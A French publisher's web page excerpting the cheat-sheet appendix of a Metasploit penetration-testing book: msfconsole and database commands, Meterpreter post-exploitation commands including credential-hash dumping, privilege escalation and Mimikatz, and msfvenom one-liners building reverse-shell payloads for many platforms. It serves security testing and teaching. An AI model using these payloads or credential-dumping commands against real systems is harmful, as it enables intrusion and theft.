Blog ENI : Toute la veille numérique !
🐠 -25€ dès 75€ 
+ 7 jours d'accès à la Bibliothèque Numérique ENI. Cliquez ici
Accès illimité 24h/24 à tous nos livres & vidéos ! 
Découvrez la Bibliothèque Numérique ENI. Cliquez ici
  1. Livres et vidéos
  2. Metasploit
  3. Aide
Extrait - Metasploit Testez la sécurité de vos infrastructures (2e edition)
Extraits du livre
Metasploit Testez la sécurité de vos infrastructures (2e edition)
1 avis
Revenir à la page d'achat du livre

Aide-mémoire

Introduction

Afin de faciliter la réalisation des tests grâce à Metasploit, voici un aide-mémoire reprenant les commandes décrites dans ce livre.

Msfconsole

1. Les commandes de base

Lancer msfconsole

: msfconsole

Afficher la version de Metasploit

: version

Afficher la bannière de Metasploit

: banner

Se connecter à un port (type netcat)

: connect

Mettre à jour Metasploit sous Kali

: apt install metasploit-framework

Charger/Décharger un module

: load / unload

Définir/Supprimer une variable

: set / unset

Définir/Supprimer une variable globale

: setg / unsetg

Enregistrer les variables dans un fichier

: save (/root/.msf4/config)

2. Les commandes liées aux modules

Afficher l’ensemble des modules

show

Afficher des modules particuliers

: show exploits/auxiliary/payloads/encoders

Faire des recherches

: search REGEXP

Obtenir des infos sur un module

: info <MODULE NAME>

Obtenir les options d’un module

: options <MODULE_NAME>

Obtenir les options avancées d’un module

: advanced <MODULE_NAME>

Utiliser un module

: use <MODULE_NAME>

Afficher les options manquantes

: show missing

Éditer un module

: edit

Lancer un interpréteur Ruby

: irb

Lancer un module

: exploit / run

3. Les commandes liées à la base de données

Initialiser la base de données

: msfdb init

Afficher le statut de la base de données

: db_status

Réinitialiser la base de données

: msfdb reinit

Importer des données

: db_import

Exporter des données

: db_export

Intégrer les scans directement en base

: db_nmap

Afficher l’ensemble des services en base

: services

Afficher l’ensemble des hôtes en base

: hosts

Afficher l’ensemble des vulnérabilités

: vulns

4. Les commandes liées aux espaces de travail

Lister les espaces de travail

: workspace

Créer un espace de travail

: workspace -a <NEW_WORKSPACE>

Changer d’espace de travail

: workspace <NEW_WORKSPACE>

Supprimer un espace de travail

: workspace -d <NEW_WORKSPACE>

Supprimer tous les espaces

: workspace -D

5. Les commandes liées aux scanneurs de vulnérabilités

Nessus

Charger le module Nessus

: load nessus

Connecter Metasploit à Nessus

: nessus_connect

Afficher l’ensemble des policies

: nessus_policy_list

Créer un nouveau scan Nessus

: nessus_scan_new

Afficher la liste des scans

: nessus_scan_list

Lancer un scan Nessus

: nessus_scan_launch

Afficher les rapports Nessus

: nessus_report_hosts &nessus_report_vulns

Télécharger...

Meterpreter

1. Commandes de bases

Afficher l’aide

: help

Placer la session en tâche de fond

: background

Disposer d’un shell Ruby

: irb

Charger des modules Meterpreter 

: load <MODULE NAME>

Changer de processus

: migrate

Faire appel à des fichiers ressources

: resource

Exécuter un module de post-exploitation

: run <MODULE NAME>

Obtenir le chemin courant sur la machine attaquante

: getlwd

Obtenir le chemin courant sur la machine victime

: getwd

Afficher les fichiers sur la machine attaquante

: lls

Afficher les fichiers sur la machine victime

: ls

Télécharger un fichier depuis la machine victime

: download source destination

Charger un fichier sur la machine victime

: upload source destination

Faire du forward de port

: portfwd

Transformer Meterpreter en shell standard

: shell

Exécuter une commande sur la machine victime

: execute

Obtenir un résumé des informations de la machine victime

: sysinfo

2. Les commandes avancées

Chercher des fichiers intéressants sur le disque

: search

Obtenir les droits SYSTEM (à partir d’un compte administrateur)

: getsystem

Obtenir les condensats LM/NTLM (injection en mémoire)

: hashdump

Obtenir les condensats LM/NTLM (base de registre)

: smart_hashdump

Charger le module Mimikatz

: load mimikatz / load kiwi

Charger le module Incognito

: load incognito

Migration d’un processus

: migrate <PID>

Démarrer l’enregistrement...

MSFvenom

Linux :

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> 
LPORT=<Your Port to Connect On> -f elf > shell.elf 

Windows :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f exe > shell.exe 

Mac :

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f macho > shell.macho 

PHP :

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f raw > shell.php 

ASP :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f asp > shell.asp 

JSP :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f raw > shell.jsp 

WAR :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f war > shell.war 

Python :

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f raw > shell.py 

Bash :

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f raw > shell.sh 

Perl :

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address>  
LPORT=<Your Port to Connect On> -f raw > shell.pl 

Mise...